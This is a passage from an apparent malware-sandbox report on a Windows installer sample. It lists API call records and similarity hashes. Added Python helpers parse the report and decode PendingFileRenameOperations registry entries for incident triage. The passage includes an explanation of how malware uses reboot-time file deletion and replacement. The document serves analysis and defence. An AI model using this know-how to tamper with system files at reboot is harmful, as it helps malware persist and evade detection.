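• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: %H
• API String ID: 65125430-1959103961
• Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
• Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-591603554
• Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
• Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
"""

# "• Name.MODULE(args), ref: 0044B401", optionally prefixed by
# "Part of subcall function 0042C804: " as in some records on this page.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[0-9A-Za-z_]+)\.(?P<module>[A-Z0-9_]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Similarity fields: "• API String ID: 1831053106-1959103961" and friends.
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(?P<value>.*?)\s*$"
)
# Strings section entries: "• PendingFileRenameOperations, xrefs: 00455A40".
STRING_LINE = re.compile(r"^\s*•\s*(?P<s>.+?),\s*xrefs:\s*(?P<x>[0-9A-F]{8})\s*$")


def parse_records(text):
    """Split report text into one dict per function record (each starts at 'APIs')."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "strings": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": m["args"].split(","),
                                "ref": m["ref"], "subcall": m["sub"]})
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur[m["key"].lower().replace(" ", "_")] = m["value"]
            continue
        m = STRING_LINE.match(line)
        if m:
            cur["strings"].append((m["s"], m["x"]))
    return records


def group_by_string_hash(records):
    """Map the string-hash half of 'API String ID' to the Opcode IDs that share it."""
    groups = defaultdict(list)
    for r in records:
        api_string_id = r.get("api_string_id", "")
        if "-" not in api_string_id:
            continue  # record without a similarity block
        _, string_hash = api_string_id.split("-", 1)
        groups[string_hash].append(r.get("opcode_id", ""))
    return dict(groups)


def dynamic_resolutions(records):
    """Return (call site, export name) for every GetProcAddress with a literal name."""
    found = []
    for r in records:
        for call in r["apis"]:
            if call["name"] == "GetProcAddress" and len(call["args"]) >= 2:
                export = call["args"][1]
                if export and not re.fullmatch(r"[0-9A-F]{8}|\?", export):
                    found.append((call["ref"], export))
    return found


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(group_by_string_hash(recs))
    print(dynamic_resolutions(recs))
```

Run over a full exported report the same grouping lets you see which functions in this sample share string hashes with functions from other samples, which is what the Opcode ID / API String ID fields are there for.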
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                      • String ID: Creating directory: %s
                                                                                                      • API String ID: 2451617938-483064649
                                                                                                      • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                      • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                      • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                      • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                                      • API String ID: 2508298434-591603554
                                                                                                      • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                      • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                      • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                      • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                      APIs
                                                                                                      • 75381520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                      • 75381500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                      • 75381540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: 753815007538152075381540
                                                                                                      • String ID: %E
                                                                                                      • API String ID: 3367396946-175436132
                                                                                                      • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                      • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                      • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                      • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0044B401
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectReleaseSelect
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 1831053106-1959103961
                                                                                                      • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                      • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                      • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                      • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                      • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                      • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$ByteCharMultiWide
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 65125430-1959103961
                                                                                                      • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                      • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                      • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                      • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                      APIs
                                                                                                      • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 395431579-1506664499
                                                                                                      • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                      • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                      • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                      • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                      Strings
                                                                                                      • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                      • API String ID: 47109696-2115312317
                                                                                                      • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                      • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                      • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                      • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
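The record above opens SYSTEM\CurrentControlSet\Control\Session Manager and reads PendingFileRenameOperations and PendingFileRenameOperations2, the values the Session Manager processes at the next boot; installer code consults them to decide whether a restart is pending (compare the "Need to restart Windows? %s" string in the earlier records), and malware that calls MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT to delete or replace files at reboot leaves its footprint in the same value. The Python below is an added example, not part of the report, that decodes the raw REG_MULTI_SZ bytes of such a value into rename and delete operations for triage. It works on the raw bytes deliberately: a delete entry is encoded as a source path followed by an empty destination string, i.e. two consecutive NULs, which APIs that treat a double NUL as the end of the list silently truncate. The sample value is constructed here (the file names in it are invented), and the `\??\` and `!` prefix handling reflects the documented value format rather than anything stated on this page.

```python
"""Decode a PendingFileRenameOperations REG_MULTI_SZ value into file operations.

Added example, not part of the Joe Sandbox report. Value format assumed:
UTF-16LE strings, each NUL-terminated, list closed by one extra NUL; entries
come in (source, destination) pairs; an empty destination means delete; a
destination starting with '!' means replace an existing file; paths carry the
NT prefix '\\??\\'.
"""


def encode_multi_sz(strings):
    """Build a REG_MULTI_SZ blob the way the registry stores it (used for the sample)."""
    body = "".join(s + "\x00" for s in strings) + "\x00"
    return body.encode("utf-16-le")


def decode_multi_sz(raw: bytes):
    """Split a REG_MULTI_SZ blob into strings, preserving empty strings inside the list."""
    text = raw.decode("utf-16-le")
    if not text:
        return []
    if not text.endswith("\x00"):
        raise ValueError("missing list terminator; value is truncated")
    text = text[:-1]              # drop the list terminator only
    parts = text.split("\x00")    # every string still ends with its own NUL ...
    return parts[:-1]             # ... so the final split element is always an artifact


def strip_nt_prefix(path: str) -> str:
    """Turn '\\??\\C:\\x' into 'C:\\x' for readability; leave other forms alone."""
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_renames(raw: bytes):
    """Return a list of {'op': 'delete'|'rename', ...} dicts from the raw value."""
    entries = decode_multi_sz(raw)
    if len(entries) % 2:
        raise ValueError("odd number of entries; value is corrupt or truncated")
    ops = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        src = strip_nt_prefix(src)
        if dst == "":
            ops.append({"op": "delete", "source": src})
            continue
        replace = dst.startswith("!")
        dst = strip_nt_prefix(dst[1:] if replace else dst)
        ops.append({"op": "rename", "source": src, "destination": dst,
                    "replace_existing": replace})
    return ops


def flag_system_targets(ops, roots=(r"C:\Windows\System32", r"C:\Windows\SysWOW64")):
    """Triage helper: operations that touch a system directory deserve a closer look."""
    flagged = []
    for op in ops:
        targets = [op["source"]] + ([op["destination"]] if op["op"] == "rename" else [])
        if any(t.lower().startswith(r.lower()) for t in targets for r in roots):
            flagged.append(op)
    return flagged


# Constructed sample value (invented paths): one delete-at-reboot and one replace.
SAMPLE_VALUE = encode_multi_sz([
    r"\??\C:\Windows\Temp\update.tmp", "",
    r"\??\C:\Windows\System32\drivers\helper.sys.new", r"!\??\C:\Windows\System32\drivers\helper.sys",
])

if __name__ == "__main__":
    for op in parse_pending_renames(SAMPLE_VALUE):
        print(op)
```

On a live system the raw bytes come from reading the value with a REG_MULTI_SZ-aware tool or from an exported hive; feeding them through `parse_pending_renames` and then `flag_system_targets` gives the list of files the next boot will delete or replace, which is the question an incident responder actually has when this key shows up in a sample's behaviour.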
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                      • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                      • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                      • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                      • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                      • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                      • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                      • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                      • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                      • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                      APIs
                                                                                                      • GetMenu.USER32(00000000), ref: 00421361
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu
                                                                                                      • String ID:
                                                                                                      • API String ID: 3711407533-0
                                                                                                      • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                      • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                      • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                      • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 601730667-0
                                                                                                      • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                      • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                      • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                      • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042311E
                                                                                                      • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceEnumFontsRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2698912916-0
